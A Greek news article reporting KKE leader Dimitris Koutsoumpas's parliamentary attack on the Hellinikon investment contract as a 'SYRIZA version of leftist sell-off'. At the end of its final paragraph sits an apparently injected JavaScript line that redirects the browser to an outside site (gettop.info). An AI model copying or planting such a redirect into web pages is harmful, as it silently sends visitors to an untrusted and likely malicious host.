Κουτσούμπας: Η σύμβαση του Ελληνικού η «ΣΥΡΙΖΑίικη εκδοχή του αριστερού ξεπουλήματος»

0
3

 

Κατά τη συζήτηση στη Βουλή για την επένδυση στο Ελληνικό ο γενικός γραμματέας της Κεντρικής Επιτροπής του ΚΚΕ Δημήτρης Κουτσούμπας χαρακτήρισε τη σύμβαση του Ελληνικού «ΣΥΡΙΖΑίικη εκδοχή του αριστερού ξεπουλήματος».

Όπως επεσήμανε αυτή η σύμβαση είναι απολύτως συνυφασμένη με τις επιλογές της διετούς διακυβέρνησης σε όλα τα κρίσιμα ζητήματα και τα νομοσχέδια, αρχής γενομένης από το τρίτο μνημόνιο και συμπλήρωσε πως στόχος είναι να μεγαλώνουν τα κέρδη του κεφαλαίου και των ομίλων που κατασπαράζουν τη σάρκα της Ελλάδας, σε αγαστή συνεργασία με τους ευρωενωσιακούς εταίρους και τα άλλα «ευαγή ιδρύματα του καπιταλισμού».

Ο κ. Κουτσούμπας ανέφερε ότι ο επενδυτικός όμιλος Λάτση, που έχει αναλάβει το έργο, έχει ξεκινήσει μια εκτεταμένη προπαγανδιστική εκστρατεία προκειμένου να πείσουν τα λαϊκά στρώματα της περιοχής του Ελληνικού και γενικότερα της Αττικής να αποδεχτούν και να αγκαλιάσουν το έργο, έχοντας σε αυτό «μια σκανδαλώδη στήριξη από κυβερνητικά στελέχη αλλά και όλο το φάσμα των αστικών πολιτικών δυνάμεων, που δεν κρύβουν την ταύτισή τους με την ΣΥΡΙΖΑίικη εκδοχή του αριστερού ξεπουλήματος».

«Γι’ αυτό άλλωστε είναι και κάλπικη η αντιπαράθεση μεταξύ τους. Εστιάζεται μόνο στα θέματα διαφθοράς και αποτελεσματικότητας της διαχείρισης», αιτιολόγησε, επικαλούμενος ως πιο χαρακτηριστικό το παράδειγμα των τηλεοπτικών αδειών όπου «η κυβέρνηση χαρακτηρίζει ως δήθεν κάθαρση του τηλεοπτικού τοπίου την αμφίβολη αντικατάσταση ορισμένων καναλαρχών από άλλους, που τους έχουν και τους θεωρούν οι ίδιοι, άλλους υπόδικους, άλλους νέους κρατικούς εργολάβους βοσκοτοπίων κ.λπ.» όταν η ενημέρωση εξακολουθεί να βρίσκεται στα χέρια του κεφαλαίου και εκεί θα μείνει. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here